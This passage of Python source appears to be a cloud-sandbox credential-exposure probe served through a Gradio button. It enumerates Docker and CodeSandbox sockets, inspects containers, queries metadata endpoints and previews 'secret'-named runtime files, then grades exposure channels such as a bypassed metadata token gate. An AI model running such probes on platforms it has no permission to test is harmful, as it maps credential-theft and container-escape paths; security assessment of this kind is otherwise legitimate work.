    git_socks = [p for p in socket_files if "git" in p and p.endswith(".sock")]
    vscode_socks = [p for p in socket_files if "vscode" in p]
    classified = set(docker_socks) | set(pitcher_socks) | set(git_socks) | set(vscode_socks)
    other_socks = [p for p in socket_files if p not in classified]
    # Probe the first socket of each high-value kind, if any.
    docker_probe = _probe_docker_socket(docker_socks[0]) if docker_socks else None
    pitcher_probe = _probe_pitcher_socket(pitcher_socks[0]) if pitcher_socks else None
    return {
        "status": "detected" if socket_files else "not_found",
        "total_count": len(socket_files),
        "docker_sockets": docker_socks,
        "pitcher_sockets": pitcher_socks,
        "git_sockets": git_socks,
        "vscode_sockets": vscode_socks,
        "other_sockets": other_socks,
        "docker_probe": docker_probe,
        "pitcher_probe": pitcher_probe,
    }
def _probe_docker_socket(sock_path):
    """Interact with Docker daemon via UDS: list containers, inspect, images.

    All values that may carry secrets (container env) are redacted; failures
    are recorded per-container under inspect_error or globally under error.
    """
    result = {"socket_path": sock_path, "accessible": False}
    if not os.path.exists(sock_path):
        result["error"] = "not_found"
        return result
    try:
        # List containers
        raw = uds_http_get(sock_path, "/containers/json?all=true")
        containers = json.loads(raw)
        result["accessible"] = True
        result["container_count"] = len(containers)
        result["containers"] = []
        for c in containers[:10]:
            cid = c.get("Id", "")[:12]  # short id is enough for inspect calls
            entry = {
                "id_short": cid,
                "image": c.get("Image", ""),
                "state": c.get("State", ""),
                "names": c.get("Names", []),
            }
            # Inspect each container for ENV and Mounts
            try:
                inspect_raw = uds_http_get(sock_path,
                                           f"/containers/{cid}/json")
                inspect = json.loads(inspect_raw)
                env_list = inspect.get("Config", {}).get("Env", [])
                entry["env"] = []
                for e in env_list:
                    if "=" in e:
                        # Keep the key, redact the value.
                        k, _, v = e.partition("=")
                        entry["env"].append(f"{k}={redact_value(v, 16)}")
                    else:
                        entry["env"].append(e)
                mounts = inspect.get("Mounts", [])
                entry["mounts"] = [{
                    "type": m.get("Type"), "src": m.get("Source"),
                    "dst": m.get("Destination"), "rw": m.get("RW"),
                } for m in mounts]
                # HostConfig flags relevant to container-escape risk.
                hc = inspect.get("HostConfig", {})
                entry["privileged"] = hc.get("Privileged")
                entry["pid_mode"] = hc.get("PidMode")
                entry["network_mode"] = hc.get("NetworkMode")
                entry["cap_add"] = hc.get("CapAdd")
            except Exception as exc:
                entry["inspect_error"] = f"{type(exc).__name__}: {exc}"
            result["containers"].append(entry)
        # List images
        img_raw = uds_http_get(sock_path, "/images/json")
        images = json.loads(img_raw)
        result["image_count"] = len(images)
        result["images"] = [{
            "id_short": img.get("Id", "")[:20],
            "tags": img.get("RepoTags", []),
            "size_mb": round(img.get("Size", 0) / 1048576, 1),
        } for img in images[:15]]
    except Exception as exc:
        result["error"] = f"{type(exc).__name__}: {exc}"
    return result
def _probe_pitcher_socket(sock_path):
    """Probe CodeSandbox pitcher socket – try HTTP and JSON protocols.

    Records a hint entry (response preview or error) per attempt; the socket
    counts as accessible if any attempt got a response.
    """
    result = {"socket_path": sock_path, "exists": os.path.exists(sock_path),
              "accessible": False, "http_hints": [], "json_hints": []}
    if not result["exists"]:
        return result
    # HTTP attempts
    for method_path in [("GET", "/"), ("GET", "/health"), ("GET", "/status")]:
        method, path = method_path
        try:
            s = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
            try:
                s.settimeout(2)
                s.connect(sock_path)
                req = f"{method} {path} HTTP/1.0\r\nHost: localhost\r\n\r\n"
                s.sendall(req.encode())
                resp = s.recv(2048).decode("utf-8", errors="replace")
            finally:
                # Fix: the socket previously leaked when connect/recv raised.
                s.close()
            result["accessible"] = True
            result["http_hints"].append({
                "request": f"{method} {path}",
                "response_preview": sanitize_preview(resp, 300),
            })
        except Exception as exc:
            result["http_hints"].append({
                "request": f"{method} {path}",
                "error": f"{type(exc).__name__}: {exc}",
            })
    # JSON-RPC / custom JSON attempts
    json_payloads = [
        {"jsonrpc": "2.0", "method": "list", "id": 1},
        {"jsonrpc": "2.0", "method": "help", "id": 2},
        {"jsonrpc": "2.0", "method": "status", "id": 3},
        {"jsonrpc": "2.0", "method": "ls", "params": {"path": "/"}, "id": 4},
        {"type": "list"},
        {"type": "status"},
        {"type": "readdir", "params": {"path": "/"}},
        {"action": "list_files", "path": "/"},
    ]
    for payload in json_payloads:
        try:
            resp = uds_send_json(sock_path, payload, timeout=2)
            result["accessible"] = True
            result["json_hints"].append({
                "request": payload,
                "response_preview": sanitize_preview(resp, 300),
            })
        except Exception as exc:
            result["json_hints"].append({
                "request": payload,
                "error": f"{type(exc).__name__}: {exc}",
            })
    return result
# ---------------------------------------------------------------------------
# Container runtime artifacts (Podman/crun/libpod)
# ---------------------------------------------------------------------------
def collect_container_runtime_artifacts():
    """Sample Podman/crun/libpod runtime artifacts (listings + config previews).

    Returns directory listings for existing artifact roots plus previews of
    JSON/config/secret-named files found beneath them, capped at ~30 entries.
    """
    results = []
    for path in PODMAN_ARTIFACT_PATHS:
        info = list_directory(path, limit=30)
        if info.get("exists"):
            results.append(info)
    # Read JSON configs under libpod / crun
    for base in PODMAN_ARTIFACT_PATHS:
        target = normalize_path(base)
        if not os.path.isdir(target):
            continue
        for root, dirs, files in os.walk(target):
            for f in files:
                if f.endswith(".json") or "config" in f.lower() or "secret" in f.lower():
                    fpath = os.path.join(root, f)
                    results.append(read_preview(fpath, limit=1024))
                    if len(results) > 30:
                        # Fix: the former `break` only left the inner file
                        # loop, so os.walk kept appending past the cap.
                        return results
    return results
# ---------------------------------------------------------------------------
# DNS resolution
# ---------------------------------------------------------------------------
def resolve_hosts():
    """Resolve the metadata hostnames/IPs, recording addresses and latency."""
    targets = ["metadata.google.internal", "169.254.169.254", "100.100.100.200"]
    outcomes = []
    for host in targets:
        t0 = time.time()
        try:
            infos = socket.getaddrinfo(host, 80, type=socket.SOCK_STREAM)
        except Exception as exc:
            outcomes.append({"hostname": host, "ok": False,
                             "error": f"{type(exc).__name__}: {exc}",
                             "latency_ms": round((time.time() - t0) * 1000, 2)})
        else:
            addrs = sorted({i[4][0] for i in infos})
            outcomes.append({"hostname": host, "ok": True, "addresses": addrs,
                             "latency_ms": round((time.time() - t0) * 1000, 2)})
    return outcomes
# ---------------------------------------------------------------------------
# Assessment (channel-mapped)
# ---------------------------------------------------------------------------
def build_assessment(report):
    """Produce a concise, channel-mapped assessment with severity.

    Walks the nine channel collector results in ``report["channels"]``,
    emits one finding per channel whose status indicates credential
    exposure, and rolls individual severities up into an overall rating
    (high > medium > low > none).

    Parameters:
        report: full probe report dict; only the ``"channels"`` mapping is
            read here.

    Returns:
        dict with ``overall_severity``, ``finding_count``,
        ``channel_summary`` (``channel_<n>`` -> status, ``"not_checked"``
        when the channel entry is absent) and ``findings``.
    """
    # Channel-key suffixes indexed by channel number 1-9. Defined once so
    # the per-channel lookups and the summary loop cannot drift apart.
    suffixes = (
        "imds_mmds", "ecs_endpoint", "irsa_wi", "k8s_sa_token",
        "sdk_config", "env_injection", "credential_helper",
        "sidecar_proxy", "uds_proxy",
    )
    channels = report["channels"]

    def channel(num):
        # Tolerate a missing channel entry (treated as not checked) so a
        # partial report cannot crash the assessment with a KeyError.
        return channels.get(f"ch{num}_{suffixes[num - 1]}", {})

    findings = []
    # CH1: IMDS / MMDS metadata endpoint.
    ch1 = channel(1)
    if ch1.get("status") == "token_gate_bypassed":
        findings.append({
            "channel": 1, "name": "IMDS/MMDS",
            "severity": "high",
            "title": "MMDS token gate bypassed – full keyspace readable",
            "detail": "IMDSv2 PUT from within sandbox returns a valid session token; "
                      "MMDS data including additional_files is fully accessible.",
            "evidence_keys": ["channels.ch1_imds_mmds.mmds_dump"],
        })
    elif ch1.get("status") == "directly_reachable":
        findings.append({
            "channel": 1, "name": "IMDS/MMDS",
            "severity": "high",
            "title": "Metadata endpoint directly reachable without any gate",
            "detail": f"Reachable probes: {ch1['directly_reachable']}",
        })
    elif ch1.get("status") == "token_gated":
        findings.append({
            "channel": 1, "name": "IMDS/MMDS",
            "severity": "medium",
            "title": "MMDS token-gated – token acquisition failed",
            "detail": "Endpoint responds with 401; PUT token attempts did not succeed.",
        })
    # CH2: ECS container credential endpoint.
    ch2 = channel(2)
    if ch2.get("status") == "detected":
        findings.append({
            "channel": 2, "name": "ECS Container Endpoint",
            "severity": "high",
            "title": "ECS credential endpoint reachable",
            "detail": "AWS_CONTAINER_CREDENTIALS env var present and endpoint returned credentials.",
        })
    # CH3: IRSA / workload-identity projected token volume.
    ch3 = channel(3)
    if ch3.get("status") == "detected":
        findings.append({
            "channel": 3, "name": "IRSA/WI Projected Volume",
            "severity": "high",
            "title": "Workload identity token file accessible",
            "detail": f"Pointers: {[p['env_key'] for p in ch3['pointers']]}",
        })
    # CH4: Kubernetes service-account token file.
    ch4 = channel(4)
    if ch4.get("status") == "detected":
        findings.append({
            "channel": 4, "name": "K8s SA Token",
            "severity": "medium",
            "title": "Kubernetes service account token present",
            "detail": f"JWT-like: {ch4.get('jwt_like')}, "
                      f"namespace: {ch4.get('namespace', 'unknown')}",
        })
    # CH5: SDK credential files on disk.
    ch5 = channel(5)
    if ch5.get("status") == "detected":
        findings.append({
            "channel": 5, "name": "SDK Config Files",
            "severity": "high",
            "title": "Cloud SDK credential files found on disk",
            "detail": f"Files: {[f['path'] for f in ch5['files']]}",
        })
    # CH6: sensitive environment-variable injection.
    ch6 = channel(6)
    if ch6.get("status") == "detected":
        cp = ch6["cross_process"]
        findings.append({
            "channel": 6, "name": "ENV Injection",
            "severity": "medium",
            "title": f"Sensitive env vars detected "
                     f"(current={ch6['current_process_interesting_count']}, "
                     f"cross-proc={cp.get('finding_count', 0)})",
            "detail": f"Cross-process readable: {cp.get('pids_readable', 0)}"
                      f"/{cp.get('pids_sampled', 0)} pids",
        })
    # CH7: docker credential helper binaries.
    ch7 = channel(7)
    if ch7.get("status") == "detected":
        findings.append({
            "channel": 7, "name": "Credential Helper",
            "severity": "medium",
            "title": f"Docker credential helpers found: "
                     f"{[h['name'] for h in ch7['helpers']]}",
            "detail": f"Config: {ch7.get('config_path')}",
        })
    # CH8: sidecar / reverse-proxy indicators (informational only).
    ch8 = channel(8)
    if ch8.get("status") == "possible":
        findings.append({
            "channel": 8, "name": "Sidecar/Proxy",
            "severity": "info",
            "title": "Proxy or traffic redirect indicators detected",
            "detail": f"Indicators: {len(ch8['indicators'])}",
        })
    # CH9: unix-domain-socket proxies (docker.sock escalates severity).
    ch9 = channel(9)
    if ch9.get("status") == "detected":
        docker_ok = (ch9.get("docker_probe") or {}).get("accessible", False)
        pitcher_ok = (ch9.get("pitcher_probe") or {}).get("accessible", False)
        parts = []
        if docker_ok:
            n = ch9["docker_probe"].get("container_count", 0)
            parts.append(f"docker.sock accessible ({n} containers)")
        if pitcher_ok:
            parts.append("pitcher socket accessible")
        findings.append({
            "channel": 9, "name": "UDS Proxy",
            "severity": "high" if docker_ok else "medium",
            "title": "; ".join(parts) if parts else f"{ch9['total_count']} sockets found",
            "detail": f"Docker: {docker_ok}, Pitcher: {pitcher_ok}, "
                      f"Total sockets: {ch9['total_count']}",
        })
    # Overall severity: the worst individual finding wins.
    severities = {f["severity"] for f in findings}
    if "high" in severities:
        overall = "high"
    elif "medium" in severities:
        overall = "medium"
    elif findings:
        overall = "low"
    else:
        overall = "none"
    # Per-channel status summary, reusing the same key construction as above.
    channel_summary = {
        f"channel_{i}": channel(i).get("status", "not_checked")
        for i in range(1, 10)
    }
    return {
        "overall_severity": overall,
        "finding_count": len(findings),
        "channel_summary": channel_summary,
        "findings": findings,
    }
# ---------------------------------------------------------------------------
# Main
# ---------------------------------------------------------------------------
def parse_args():
    """Parse command-line options for the probe.

    Flags:
        --timeout: per-request timeout in seconds (defaults to
            DEFAULT_TIMEOUT).
        --json-out: optional path to write the JSON report to.
    """
    cli = argparse.ArgumentParser(
        description="Cloud Sandbox Credential Surface Probe v2",
    )
    cli.add_argument("--timeout", type=float, default=DEFAULT_TIMEOUT)
    cli.add_argument("--json-out", help="Write JSON report to file")
    return cli.parse_args()
def main():
    """Run every collector and assemble the full channel-mapped report.

    Builds the report stepwise in the same order as the collectors run:
    runtime/DNS context first, then channels 1-9, then container runtime
    artifacts, and finally the assessment derived from the whole report.
    """
    opts = parse_args()
    timeout = opts.timeout
    report = {}
    report["version"] = "2.0"
    report["timestamp"] = int(time.time())
    report["runtime"] = get_runtime()
    report["dns"] = resolve_hosts()
    report["runtime_context"] = collect_runtime_context()
    report["channels"] = {
        "ch1_imds_mmds": collect_channel_1(timeout),
        "ch2_ecs_endpoint": collect_channel_2(timeout),
        "ch3_irsa_wi": collect_channel_3(),
        "ch4_k8s_sa_token": collect_channel_4(),
        "ch5_sdk_config": collect_channel_5(),
        "ch6_env_injection": collect_channel_6(),
        "ch7_credential_helper": collect_channel_7(),
        "ch8_sidecar_proxy": collect_channel_8(),
        "ch9_uds_proxy": collect_channel_9(timeout),
    }
    report["container_runtime_artifacts"] = collect_container_runtime_artifacts()
    # Assessment must come last: it reads the fully populated report.
    report["assessment"] = build_assessment(report)
    return report
def probe_environment():
    """Gradio click callback: run the full probe and return the report."""
    return main()
# Gradio UI: a single button that runs the probe and renders the report.
with gr.Blocks() as demo:
    gr.Markdown("## 环境探测器")
    out = gr.Textbox(label="探测结果", lines=20)
    btn = gr.Button("开始探测")
    # probe_environment() returns a nested dict; fed straight to a Textbox it
    # would be rendered as a one-line Python repr. Serialize to indented JSON
    # (default=str covers any non-JSON-native values) for a readable report.
    btn.click(
        fn=lambda: json.dumps(probe_environment(), ensure_ascii=False,
                              indent=2, default=str),
        inputs=[],
        outputs=out,
    )
demo.launch()